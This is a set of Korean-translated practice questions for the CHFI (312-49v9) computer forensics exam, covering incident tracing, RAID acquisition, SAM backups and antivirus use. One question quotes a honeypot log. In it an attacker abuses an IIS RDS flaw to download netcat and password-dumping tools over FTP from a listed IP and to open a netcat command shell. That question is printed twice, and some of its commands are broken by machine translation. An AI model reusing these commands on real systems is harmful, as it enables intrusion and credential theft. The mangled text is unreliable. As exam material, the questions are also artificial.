312-49v9 문제 106
공격이 시작된 방법에서 피해자가 영향을 받은 방법에 이르기까지 전체 사건을 추적하는 포렌식 조사 개념은 무엇입니까?
312-49v9 문제 107
Brian은 RAID 스토리지에서 데이터를 가져와야 합니다. 다음 중 조사와 관련된 데이터만 검색하기 위해 권장되는 수집 방법은 무엇입니까?
312-49v9 문제 108
다음은 에서 호스팅된 허니팟 로그에서 발췌한 것입니다.
lab.wiretrip.net. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일
권한 정규화 취약점(UNICODE 공격)은 일반적으로 스크립트를 실행할 수 있는 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini 표시에 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
lab.wiretrip.net. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일
권한 정규화 취약점(UNICODE 공격)은 일반적으로 스크립트를 실행할 수 있는 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini 표시에 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
312-49v9 문제 109
Harold는 컴퓨터에서 백업 SAM 파일을 가져오기 위해 rdisk /s 명령을 방금 실행한 보안 분석가입니다. Harold는 파일을 찾기 위해 컴퓨터에서 어디를 탐색해야 합니까?
312-49v9 문제 110
컴퓨터 포렌식 조사 중 바이러스 백신 스캐너 사용과 관련하여 다음을 수행해야 합니다.
